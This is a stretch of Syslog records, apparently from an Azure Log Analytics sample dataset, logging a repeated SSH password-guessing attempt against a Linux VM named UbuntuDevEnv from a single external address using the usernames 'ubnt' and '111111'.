+2034,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:14,UbuntuDevEnv,2019-06-28 05:07:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2035,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:16,UbuntuDevEnv,2019-06-28 05:07:16,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 193.201.224.232 port 59417 ssh2,91298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,59417,,
+2036,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:17,UbuntuDevEnv,2019-06-28 05:07:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2037,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:19,UbuntuDevEnv,2019-06-28 05:07:19,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 193.201.224.232 port 59417 ssh2,91298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,59417,,
+2038,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:19,UbuntuDevEnv,2019-06-28 05:07:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2039,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:21,UbuntuDevEnv,2019-06-28 05:07:20,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 193.201.224.232 port 59417 ssh2,91298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,59417,,
+2040,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:21,UbuntuDevEnv,2019-06-28 05:07:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2041,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:23,UbuntuDevEnv,2019-06-28 05:07:23,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 193.201.224.232 port 59417 ssh2,91298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,59417,,
+2042,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:23,UbuntuDevEnv,2019-06-28 05:07:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2043,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:26,UbuntuDevEnv,2019-06-28 05:07:25,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,91298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2044,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:26,UbuntuDevEnv,2019-06-28 05:07:25,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user ubnt from 193.201.224.232 port 59417 ssh2 [preauth],91298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,59417,,
+2045,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:26,UbuntuDevEnv,2019-06-28 05:07:25,auth,UbuntuDevEnv,info,Disconnecting invalid user ubnt 193.201.224.232 port 59417: Too many authentication failures [preauth],91298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,59417,,
+2046,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:26,UbuntuDevEnv,2019-06-28 05:07:25,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2047,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:26,UbuntuDevEnv,2019-06-28 05:07:25,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 193.201.224.232 port 59417 ssh2,91298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,59417,,
+2048,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:29,UbuntuDevEnv,2019-06-28 05:07:29,auth,UbuntuDevEnv,info,Invalid user ubnt from 193.201.224.232 port 40637,91364,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,40637,,
+2049,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:29,UbuntuDevEnv,2019-06-28 05:07:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91364,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2050,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:29,UbuntuDevEnv,2019-06-28 05:07:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91364,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2051,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:31,UbuntuDevEnv,2019-06-28 05:07:31,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 193.201.224.232 port 40637 ssh2,91364,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,40637,,
+2052,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:32,UbuntuDevEnv,2019-06-28 05:07:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91364,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2053,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:34,UbuntuDevEnv,2019-06-28 05:07:33,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 193.201.224.232 port 40637 ssh2,91364,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,40637,,
+2054,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:34,UbuntuDevEnv,2019-06-28 05:07:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91364,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2055,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:36,UbuntuDevEnv,2019-06-28 05:07:36,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 193.201.224.232 port 40637 ssh2,91364,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,40637,,
+2056,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:38,UbuntuDevEnv,2019-06-28 05:07:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91364,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2057,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:40,UbuntuDevEnv,2019-06-28 05:07:39,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 193.201.224.232 port 40637 ssh2,91364,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,40637,,
+2058,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:40,UbuntuDevEnv,2019-06-28 05:07:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91364,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2059,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:42,UbuntuDevEnv,2019-06-28 05:07:41,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 193.201.224.232 port 40637 ssh2,91364,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,40637,,
+2060,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:42,UbuntuDevEnv,2019-06-28 05:07:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91364,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2061,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:43,UbuntuDevEnv,2019-06-28 05:07:43,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91364,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2062,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:43,UbuntuDevEnv,2019-06-28 05:07:43,auth,UbuntuDevEnv,info,Disconnecting invalid user ubnt 193.201.224.232 port 40637: Too many authentication failures [preauth],91364,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,40637,,
+2063,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:43,UbuntuDevEnv,2019-06-28 05:07:43,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,91364,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2064,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:43,UbuntuDevEnv,2019-06-28 05:07:43,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user ubnt from 193.201.224.232 port 40637 ssh2 [preauth],91364,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,40637,,
+2065,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:07:43,UbuntuDevEnv,2019-06-28 05:07:43,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 193.201.224.232 port 40637 ssh2,91364,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,40637,,
+2066,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:04,UbuntuDevEnv,2019-06-28 05:08:03,auth,UbuntuDevEnv,info,Invalid user ubnt from 193.201.224.232 port 21659,91415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,21659,,
+2067,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:04,UbuntuDevEnv,2019-06-28 05:08:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2068,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:04,UbuntuDevEnv,2019-06-28 05:08:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2069,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:06,UbuntuDevEnv,2019-06-28 05:08:05,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 193.201.224.232 port 21659 ssh2,91415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,21659,,
+2070,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:08,UbuntuDevEnv,2019-06-28 05:08:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2071,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:10,UbuntuDevEnv,2019-06-28 05:08:09,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 193.201.224.232 port 21659 ssh2,91415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,21659,,
+2072,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:10,UbuntuDevEnv,2019-06-28 05:08:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2073,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:12,UbuntuDevEnv,2019-06-28 05:08:11,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 193.201.224.232 port 21659 ssh2,91415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,21659,,
+2074,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:12,UbuntuDevEnv,2019-06-28 05:08:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2075,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:14,UbuntuDevEnv,2019-06-28 05:08:13,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 193.201.224.232 port 21659 ssh2,91415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,21659,,
+2076,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:14,UbuntuDevEnv,2019-06-28 05:08:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2077,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:16,UbuntuDevEnv,2019-06-28 05:08:15,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 193.201.224.232 port 21659 ssh2,91415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,21659,,
+2078,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:16,UbuntuDevEnv,2019-06-28 05:08:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2079,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:18,UbuntuDevEnv,2019-06-28 05:08:18,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user ubnt from 193.201.224.232 port 21659 ssh2 [preauth],91415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,21659,,
+2080,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:18,UbuntuDevEnv,2019-06-28 05:08:18,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 193.201.224.232 port 21659 ssh2,91415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,21659,,
+2081,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:18,UbuntuDevEnv,2019-06-28 05:08:18,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,91415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2082,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:18,UbuntuDevEnv,2019-06-28 05:08:18,auth,UbuntuDevEnv,info,Disconnecting invalid user ubnt 193.201.224.232 port 21659: Too many authentication failures [preauth],91415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,21659,,
+2083,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:18,UbuntuDevEnv,2019-06-28 05:08:18,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2084,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:20,UbuntuDevEnv,2019-06-28 05:08:20,auth,UbuntuDevEnv,info,Invalid user ubnt from 193.201.224.232 port 44988,91537,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,44988,,
+2085,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:20,UbuntuDevEnv,2019-06-28 05:08:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91537,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2086,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:20,UbuntuDevEnv,2019-06-28 05:08:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91537,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2087,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:22,UbuntuDevEnv,2019-06-28 05:08:22,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 193.201.224.232 port 44988 ssh2,91537,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,44988,,
+2088,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:25,UbuntuDevEnv,2019-06-28 05:08:24,auth,UbuntuDevEnv,info,"Disconnecting invalid user ubnt 193.201.224.232 port 44988: Change of username or service not allowed: (ubnt,ssh-connection) -> (111111,ssh-connection) [preauth]",91537,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,193.201.224.2,44988,,
+2089,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:25,UbuntuDevEnv,2019-06-28 05:08:25,auth,UbuntuDevEnv,info,Invalid user 111111 from 193.201.224.232 port 10000,91561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,111111,193.201.224.2,10000,,
+2090,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:25,UbuntuDevEnv,2019-06-28 05:08:25,auth,UbuntuDevEnv,info,Failed none for invalid user 111111 from 193.201.224.232 port 10000 ssh2,91561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,111111,193.201.224.2,10000,,
+2091,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:25,UbuntuDevEnv,2019-06-28 05:08:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2092,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:25,UbuntuDevEnv,2019-06-28 05:08:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2093,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:27,UbuntuDevEnv,2019-06-28 05:08:26,auth,UbuntuDevEnv,info,Failed password for invalid user 111111 from 193.201.224.232 port 10000 ssh2,91561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,111111,193.201.224.2,10000,,
